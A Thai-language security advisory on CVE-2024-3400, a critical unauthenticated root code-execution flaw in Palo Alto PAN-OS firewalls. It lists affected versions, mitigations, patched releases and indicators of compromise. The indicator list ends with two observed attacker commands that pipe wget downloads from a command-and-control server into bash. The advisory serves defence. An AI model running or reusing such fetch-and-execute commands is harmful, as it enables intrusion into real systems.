‍

ช่องโหว่ดังกล่าวถูกกำหนดหมายเลข CVE คือ CVE-2024-3400 (คะแนน CVSS Score 10.0/10.0 Critical) โดยช่องโหว่ดังกล่าวส่งผลให้ผู้ไม่ประสงค์ดีสามารถส่ง Code หรือ Command อันตรายเข้าไปยังอุปกรณ์ Palo Alto PAN-OS ให้สามารถทำงานตามที่ผู้ไม่ประสงค์ดีต้องการได้ (Arbitrary Code Execution) โดยไม่จำเป็นต้นทำการตรวจสอบหรือยืนยันตัวตน (Unauthenticated) ซึ่งจะทำงานในระดับสิทธิ์ root

ช่องโหว่นี้ส่งผลกระทบกับ PAN-OS 10.2, PAN-OS 11.0, และ PAN-OS 11.1 บนอุปกรณ์ Palo Alto Firewall ถ้าทำการเปิดใช้งานฟีเจอร์ device telemetry and GlobalProtect

 ในขณะที่ Palo Alto Networks ได้เริ่มปล่อยโปรแกรมแก้ไขด่วนในวันจันทร์เพื่อรักษาความปลอดภัยไฟร์วอลล์ที่ไม่ได้รับแพตช์ ซึ่งปัจจุบันช่องโหว่ดังกล่าวได้ถูกจัดเป็นช่องโหว่ชนิด Zero-day และมีการใช้โจมตีแล้วตั้งแต่วันที่ 26 มีนาคมเป็นต้นมา พบมีการใช้งาน Backdoor ที่ใช้ Upstyle Malware เพื่อเคลื่อนย้ายการโจมตีเพิ่มเติมเข้าไปยังเครือข่ายภายใน และขโมยข้อมูลโดย กลุ่มภัยคุกคามที่เชื่อว่าได้รับการสนับสนุนจากรัฐและมีรหัสติดตามคือ UTA0218

Shadowserver แพลตฟอร์มตรวจสอบภัยคุกคามความปลอดภัยกล่าวว่าเห็นไฟร์วอลล์ PAN-OS มากกว่า 156,000 รายการบนเครือข่ายอินเทอร์เน็ตทุกวัน แต่อย่างไรก็ตามทาง Shadowserver ไม่ได้ให้ข้อมูลว่ามีความเสี่ยงจำนวนเท่าใด โดยเมื่อวันศุกร์ที่ผ่านมา นักวิจัยด้านภัยคุกคาม Yutaka Sejiyama ได้ค้นพบไฟร์วอลล์มากกว่า 82,000 ตัวที่เสี่ยงต่อการโจมตี CVE-2024-3400 โดย 40% อยู่ในสหรัฐอเมริกา

สำหรับวิธีการป้องกันช่องโหว่นี้เบื้องต้น (Workarounds and Mitigations)

• ทำการตั้งค่า block attacks ช่องโหว่นี้ด้วย Threat ID 95187 and 95189 (available in Applications and Threats content version 8835-8689 and later) และทำการ Monitor อย่างใกล้ชิดเมื่อมี Threat ID ที่เกี่ยวข้องกับช่องโหว่ CVE-2024-3400 เพิ่มมาใหม่ ให้ทำการเปิดใช้งานทันที
• สำหรับ Global Protect สามารถทำตามวิธีการได้ที่ https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184
• ทำการ disabling device telemetry

Palo Alto Networks ได้เปิดเผย PAN-OS รุ่นที่แก้ไขช่องโหว่แล้ว ดังนี้

PAN-OS 10.2 :

• 10.2.9-h1 (Released 4/14/24)
• 10.2.8-h3 (Released 4/15/24)
• 10.2.7-h8 (Released 4/15/24)
• 10.2.6-h3 (Released 4/16/24)
• 10.2.5-h6 (Released 4/16/24)
• 10.2.3-h13 (ETA: 4/17/24)
• 10.2.1-h2 (ETA: 4/17/24)
• 10.2.2-h5 (ETA: 4/18/24)
• 10.2.0-h3 (ETA: 4/18/24)
• 10.2.4-h16 (ETA: 4/19/24)

PAN-OS 11.0 :

• 11.0.4-h1 (Released 4/14/24)
• 11.0.3-h10 (Released 4/16/24)
• 11.0.2-h4 (Released 4/16/24)
• 11.0.1-h4 (ETA: 4/17/24)
• 11.0.0-h3 (ETA: 4/18/24)

PAN-OS 11.1 :

• 11.1.2-h3 (Released 4/14/24)
• 11.1.1-h1 (Released 4/16/24)
• 11.1.0-h3 (Released 4/16/24)

สำหรับช่องโหว่นี้ ทาง Unit42 ซึ่งเป็นทีมนักวิจัยของ Palo Alto Networks ได้ทำการวิเคราะห์วิธีการโจมตีและ IoCs เผยแพร่สำหรับนำไปป้องกันองค์กร ดังนี้

‍

‍Indicators of Compromise

UPSTYLE Backdoor

• 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
• 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure

• 172.233.228[.]93
• hxxp://172.233.228[.]93/policy
• hxxp://172.233.228[.]93/patch
• 66.235.168[.]222

Hosted Python Backdoor

• 144.172.79[.]92
• nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands

• wget -qO- hxxp://172.233.228[.]93/patch|bash
• wget -qO- hxxp://172.233.228[.]93/policy | bash

อ้างอิง
https://www.bleepingcomputer.com/news/security/exploit-released-for-palo-alto-pan-os-bug-used-in-attacks-patch-now/

https://security.paloaltonetworks.com/CVE-2024-3400

https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184

‍